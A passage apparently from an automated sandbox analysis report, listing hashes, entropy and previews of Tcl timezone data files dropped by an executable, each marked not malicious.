                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/290msh490th4:MByMYdIp7t290v490I
                                                                                                                                                                                                                              MD5:6B570E79FA2AA7D6CB1E56A11EE0A37C
                                                                                                                                                                                                                              SHA1:396A2C9BBE4F264DD5A4F2E44D3E63C57F52186B
                                                                                                                                                                                                                              SHA-256:52921EEA2A1925DF06CEA4638ED4128FAAA8FBA40ED4E0741650B419E5152DCB
                                                                                                                                                                                                                              SHA-512:FA75A179664BED02A0F5BC1B7C3DD5F3E986544A151634BA4C4401476F5999714C89E240D9AF805484D1BEC04A1A562157FAEECA1603C4FF8CFFB424B9DEB560
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:America/Porto_Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1051
                                                                                                                                                                                                                              Entropy (8bit):3.851275104153641
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Xe4QJnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/8:5kSeSFESoSQSrSsCSeSPS1cSQSQlSsSX
                                                                                                                                                                                                                              MD5:03046BA6F8344C32AD7A22748DC871AB
                                                                                                                                                                                                                              SHA1:AB9ED078D80AE99EF6DE4BF34AC45359B82D1284
                                                                                                                                                                                                                              SHA-256:E6E6F6753E7D443052A64D4DB07B8D443CE13A573946E7D0A19CDD4BBA4A2F04
                                                                                                                                                                                                                              SHA-512:620953BB4C8CF203262EC0C1F807543D24B9894C3B531AE57F7CEF630452CC9AC7CA41D43A6D8891F9CF17594E9EE34CF501F8508E7C0669A8E5EF9C70B6EAA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Porto_Velho) {.. {-9223372036854775808 -15336 0 LMT}.. {-1767210264 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {5712012
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):283
                                                                                                                                                                                                                              Entropy (8bit):4.781646667761219
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290piDm2OH9VoHvMlFoeVVF70ZVVFUFkzk/lLJpR/lAov:MB862908mdHvCvMlGe/J0Z/uFkzk/lL1
                                                                                                                                                                                                                              MD5:E2E2E0D6677FFF2E37BBFC3522F2A9AA
                                                                                                                                                                                                                              SHA1:4C1C93E14FBC00B8B1E78B8D9631599164305EB1
                                                                                                                                                                                                                              SHA-256:2981248A9F14EBFC8791EC5453170376CBD549557E495EA0E331CC18556C958E
                                                                                                                                                                                                                              SHA-512:F056B03EB9945823F5284C840E06E298DD2DE854F1555CD16D0BB19D962B73EF34A05683E6369B0D89CB7C3F7D082C312CCA6F8C6A0BB53F5C75FE4A863FCD95
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Puerto_Rico) {.. {-9223372036854775808 -15865 0 LMT}.. {-2233035335 -14400 0 AST}.. {-873057600 -10800 0 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3729
                                                                                                                                                                                                                              Entropy (8bit):3.6253057710886956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:2RPW7xUQjzoMUBI0nuUoDKlHslPlgiot7JC/Xk8NWse4r4g5xCEmSdLkUsZOn+ZW:247xUQjzoMUBI0nuUoDK6lPlgiot7JCV
                                                                                                                                                                                                                              MD5:D4ECD2A380E55A10FB97AB1D29C619F3
                                                                                                                                                                                                                              SHA1:AAAFF44590F08623BE6F61EA6EFF6488C99A73BF
                                                                                                                                                                                                                              SHA-256:4E626BD8B9182E56ADA1E9276585E945957431EA9BEA949CE071305E4E3C70A2
                                                                                                                                                                                                                              SHA-512:677EE7093A53B48DE526C5877DB7128E8746831FE0DC44A38EB84050757E6017C9471EEF9AFCCEEEB5794D1608E486840804C01BD6276EA53F3C7823B05ED62B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Punta_Arenas) {.. {-9223372036854775808 -17020 0 LMT}.. {-2524504580 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-736632000 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}.. {37767600 -14400 0 -04}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196
                                                                                                                                                                                                                              Entropy (8bit):4.926514352074701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7pYHAIgppuRN/290ly90pl:MByMY/pcRt290w90X
                                                                                                                                                                                                                              MD5:552FBD2FBAD42F79C7993124D9CCC54B
                                                                                                                                                                                                                              SHA1:9029B7CCE8A5AD0F14C05FFBCDA4CA225DEC1708
                                                                                                                                                                                                                              SHA-256:FEC74A3FCBD9B99FDFF24B54223DA187958697CBE756A54592F6171C69F1403F
                                                                                                                                                                                                                              SHA-512:96315C32C1D0DEF804A560022DA12B3C63200A680F2A37D1B03E1C9EA413842EB6051E1C2315AE4E7C374280AD0E59832F834A8D6D66E259EF62735A77917ECE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Winnipeg)]} {.. LoadTimeZoneFile America/Winnipeg..}..set TZData(:America/Rainy_River) $TZData(:America/Winnipeg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7614
                                                                                                                                                                                                                              Entropy (8bit):3.8349162993762267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Wi8h4ZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:bqOfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:793DAEDB7E3077DE52DCC3C8A7CBEC5B
                                                                                                                                                                                                                              SHA1:37562E9F28D51DED41FFD5FF2FF19E2E4E453B7A
                                                                                                                                                                                                                              SHA-256:AA8866D58BEAB07548180628FF423887BBF48AADB1B55392B288F7310F94A9B1
                                                                                                                                                                                                                              SHA-512:68A32B41DC2D3E730D6BE53656B0D566AB1BCC1E189A2FFDB5687A947EF4F4008BC17456F8CE0D59C838EEA87A44400231A44E6AB35BEDBF5D7779E1CD7EFD8A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Rankin_Inlet) {.. {-9223372036854775808 0 0 -00}.. {-410227200 -21600 0 CST}.. {-147895200 -14400 1 CDDT}.. {-131565600 -21600 0 CST}.. {325670400 -18000 1 CDT}.. {341391600 -21600 0 CST}.. {357120000 -18000 1 CDT}.. {372841200 -21600 0 CST}.. {388569600 -18000 1 CDT}.. {404895600 -21600 0 CST}.. {420019200 -18000 1 CDT}.. {436345200 -21600 0 CST}.. {452073600 -18000 1 CDT}.. {467794800 -21600 0 CST}.. {483523200 -18000 1 CDT}.. {499244400 -21600 0 CST}.. {514972800 -18000 1 CDT}.. {530694000 -21600 0 CST}.. {544608000 -18000 1 CDT}.. {562143600 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {607507200 -18000 1 CDT}.. {625647600 -21600 0 CST}.. {638956800 -18000 1 CDT}.. {657097200 -21600 0 CST}.. {671011200 -18000 1 CDT}.. {688546800 -21600 0 CST}.. {702460800 -18000 1 CDT}.. {719996400 -21600 0 CST}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1420
                                                                                                                                                                                                                              Entropy (8bit):3.78262494063765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5aLexyGcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaI1kR8nd:5eTChlvEw6kSSx5H4a8tf3fkuoYVZDm+
                                                                                                                                                                                                                              MD5:4D12651CEE804EB9F29567CB37F12031
                                                                                                                                                                                                                              SHA1:54B2613475B8BDB1DBCCA53A4895DA021F66BDC0
                                                                                                                                                                                                                              SHA-256:A36AD4614FC9A2A433712B555156EDE03980B88EB91D8DC7E8B10451D6D7F7D3
                                                                                                                                                                                                                              SHA-512:E6690F6B6DF613C8B7289A2DB71FBC9B87B997707A6C3B4B45BDE8F347082AE8C69F212BAACE50F3C04E325ABE0976AF1F61107BDF8A15D5B88F11FAE11A9D00
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Recife) {.. {-9223372036854775808 -8376 0 LMT}.. {-1767217224 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1781
                                                                                                                                                                                                                              Entropy (8bit):4.034282439637634
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290hjmdHfCv24Q1NAvHaE+YB+Q4kRcMxIeRUVX/SEQd1rRR9xRv0+Ro/wPjp:5EjeavTGOtAVvSRBpx0yq1epwD+yz+
                                                                                                                                                                                                                              MD5:14B29B4391B643E5707096ADCC33C57E
                                                                                                                                                                                                                              SHA1:B3F875ABB79C634C74307B7CB7B276B13AEE11D1
                                                                                                                                                                                                                              SHA-256:50105E788288CF4C680B29BBDCDE94D8713A5361B38C6C469FD97CF05503FF7D
                                                                                                                                                                                                                              SHA-512:D92A51547DF2C1AB6E6CDEFF34C07B755D3F6BB5E7DD1907693E7658EDE4D2BADC5DEFDB658ADD0F8D8F14B3B87CEA17BC00DAC364C5CB7ACBF8778C245276A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Regina) {.. {-9223372036854775808 -25116 0 LMT}.. {-2030202084 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1251651600 -21600 1 MDT}.. {-1238349600 -25200 0 MST}.. {-1220202000 -21600 1 MDT}.. {-1206900000 -25200 0 MST}.. {-1188752400 -21600 1 MDT}.. {-1175450400 -25200 0 MST}.. {-1156698000 -21600 1 MDT}.. {-1144000800 -25200 0 MST}.. {-1125248400 -21600 1 MDT}.. {-1111946400 -25200 0 MST}.. {-1032714000 -21600 1 MDT}.. {-1016992800 -25200 0 MST}.. {-1001264400 -21600 1 MDT}.. {-986148000 -25200 0 MST}.. {-969814800 -21600 1 MDT}.. {-954093600 -25200 0 MST}.. {-937760400 -21600 1 MDT}.. {-922039200 -25200 0 MST}.. {-906310800 -21600 1 MDT}.. {-890589600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-748450800 -21600 1 MDT}.. {-732729600 -25200 0 MST
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7610
                                                                                                                                                                                                                              Entropy (8bit):3.8312000314798085
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:li8h4Z80NA604qSScBgN+4ctDzIVQ/c/3hNxTh:EqOzA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:541EACD872723603971058CB205121D7
                                                                                                                                                                                                                              SHA1:8F7DFD5ECA2913846D9342839AE1C60882153DA0
                                                                                                                                                                                                                              SHA-256:643CC43E3F906779C040E1F0C20E78D6E95CC7301B3C7370A8ADBCBD76A8C5E8
                                                                                                                                                                                                                              SHA-512:971D06D3FB67B7AE79EEDB6D3EBB805B5992C2BF4A7166016B405E21BFB25D9A87A757E8065073D5FBEB9084F6F742269A5BF432BF2F03D30913DB092E1AB3A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Resolute) {.. {-9223372036854775808 0 0 -00}.. {-704937600 -21600 0 CST}.. {-147895200 -14400 1 CDDT}.. {-131565600 -21600 0 CST}.. {325670400 -18000 1 CDT}.. {341391600 -21600 0 CST}.. {357120000 -18000 1 CDT}.. {372841200 -21600 0 CST}.. {388569600 -18000 1 CDT}.. {404895600 -21600 0 CST}.. {420019200 -18000 1 CDT}.. {436345200 -21600 0 CST}.. {452073600 -18000 1 CDT}.. {467794800 -21600 0 CST}.. {483523200 -18000 1 CDT}.. {499244400 -21600 0 CST}.. {514972800 -18000 1 CDT}.. {530694000 -21600 0 CST}.. {544608000 -18000 1 CDT}.. {562143600 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {607507200 -18000 1 CDT}.. {625647600 -21600 0 CST}.. {638956800 -18000 1 CDT}.. {657097200 -21600 0 CST}.. {671011200 -18000 1 CDT}.. {688546800 -21600 0 CST}.. {702460800 -18000 1 CDT}.. {719996400 -21600 0 CST}.. {73391
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.8413073465060457
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Ybe/k5Yss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6Gs:505YsMw57XJh4CxUF/A6GTrtSUDwr
                                                                                                                                                                                                                              MD5:7E23FDE0E158E8ED2E7536EDE70D2588
                                                                                                                                                                                                                              SHA1:319052BE076DC79F130E807D68B11CCAA0636340
                                                                                                                                                                                                                              SHA-256:28082D20872B61D6098D31D1C40F12464A946A933CD9AF74475C5AF384210890
                                                                                                                                                                                                                              SHA-512:BE078ED12F05AB5CEE5D77212EB76A01A1BC52EEAA17E3B91D93B88D75E5281B6AF164E712A9AB0F57A21B3CDB20F6FCCADB73CAC4745B5D2E665D18F9F06B55
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Rio_Branco) {.. {-9223372036854775808 -16272 0 LMT}.. {-1767209328 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {57120480
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.801485647578614
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/290rI5290/M7:MByMY/M7p/M16t290r190/M7
                                                                                                                                                                                                                              MD5:90830F3B1F91FE48AC2944C7C92A3F6E
                                                                                                                                                                                                                              SHA1:777377AE4959DDD2B472EB6041A23A5B93D64BB6
                                                                                                                                                                                                                              SHA-256:0117D33D4F326AA536162D36A02439FBD5F2EB3B4F540B5BA91ED7747DDAC180
                                                                                                                                                                                                                              SHA-512:20A371E4550E402AFEB83EF19EFFF6B3C0D7A68DCAA06AD894D04DB63B7096560E701C45B455B23A98BB20FE3B590F920219152415CA506AEDA427BB1381B826
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Rosario) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.869058214823402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7ekHAIgpeON/290tX2U490eBn:MByMYMpJt290c90m
                                                                                                                                                                                                                              MD5:F4E62378AA05771D348AA6DA516CD386
                                                                                                                                                                                                                              SHA1:07FCA813693F7944CBCBB128F2F2FE32929D37A2
                                                                                                                                                                                                                              SHA-256:3B4C2F3A5B9CD22A73F05187C032723D07BB53C9946D04D35E1BA1CB90CA0A62
                                                                                                                                                                                                                              SHA-512:E9F6CEB824D656CA25A72BF8EB4347A22E1A8E40410F01E0C2EDE19ACAF32D76540399796B3EBC7781C8B5D48C1A6B2C856CA06158AE37D95C95CF0567DFA2E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Santa_Isabel) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1079
                                                                                                                                                                                                                              Entropy (8bit):3.8200568741699223
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5zeUdunSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/h:52SeSFESoSQSrSsCSeSPS1cSQSQlSsSU
                                                                                                                                                                                                                              MD5:7F2658032008F2C1308F121C2EBF2479
                                                                                                                                                                                                                              SHA1:B6F24E818B4424C0DEF818C103D1DA5359958932
                                                                                                                                                                                                                              SHA-256:4A397BD937DE1D7E6A941D18001B34D4CD195AEFD08951C30C7EE8E48656AA0E
                                                                                                                                                                                                                              SHA-512:F78853AA75F58A85555DD79E08A7487E5161854650DBF480189790D855738FEDCBDA936870067DE40FE000861008A9E9AAF61DF02B6B30B96038C61B5E1F1C1D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santarem) {.. {-9223372036854775808 -13128 0 LMT}.. {-1767212472 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8871
                                                                                                                                                                                                                              Entropy (8bit):3.5351636359890537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:2Xv/lxUQjzoMUBI0nuUoDK6lPlgiot7JC/k8NWse4r4g5xCEmMQUs8nCxvisEbzu:2fD9TzDC9g32+E
                                                                                                                                                                                                                              MD5:81FC6AFF68B1CF2EA57ED13A42B35BE1
                                                                                                                                                                                                                              SHA1:5889E502FBDCBCDFE9E7053625FFFBAD61FFE256
                                                                                                                                                                                                                              SHA-256:77CED11337F43241D57C10BA752C7104A7AF8727992E7B90A3C5D62AA15E81C7
                                                                                                                                                                                                                              SHA-512:7756CBAF76966F3D45883B725B791A8DD60E8329F6FE19C12029C6FEBC90D7322765A0A8BA26FC586443A902B372D0C0189426A8F99B2B535BB8F1EE74796B44
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santiago) {.. {-9223372036854775808 -16965 0 LMT}.. {-2524504635 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-740520000 -10800 1 -03}.. {-736635600 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):616
                                                                                                                                                                                                                              Entropy (8bit):4.330655351784895
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290/StmdHhvCvuCY/h/uFkS/5MVvMrW//MVvMrpx/m0XVvMr4UB/47VvMr/d:5+seQvuCY5/u/REfk+xxdbUBQpu652GO
                                                                                                                                                                                                                              MD5:FAD0621010889164ADC4472003C9391F
                                                                                                                                                                                                                              SHA1:C4EE0B8D6925338D17D5745DE9D45FA3C628DFC5
                                                                                                                                                                                                                              SHA-256:2217E72B11A90F2D679C175DE3CC0F2FED4C280C9FF9707CFFAF118BF9A06A4B
                                                                                                                                                                                                                              SHA-512:90E8E5A109CD72458C7796CF0324F63E543CCD63D13A09A3DD28EDC8B2793C964C18E79FDF0C5067C5A481B7FB03E8413139C32F59DA07E9D7893378ABBBD2B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santo_Domingo) {.. {-9223372036854775808 -16776 0 LMT}.. {-2524504824 -16800 0 SDMT}.. {-1159773600 -18000 0 EST}.. {-100119600 -14400 1 EDT}.. {-89668800 -18000 0 EST}.. {-5770800 -16200 1 -0430}.. {4422600 -18000 0 EST}.. {25678800 -16200 1 -0430}.. {33193800 -18000 0 EST}.. {57733200 -16200 1 -0430}.. {64816200 -18000 0 EST}.. {89182800 -16200 1 -0430}.. {96438600 -18000 0 EST}.. {120632400 -16200 1 -0430}.. {127974600 -18000 0 EST}.. {152082000 -14400 0 AST}.. {975823200 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
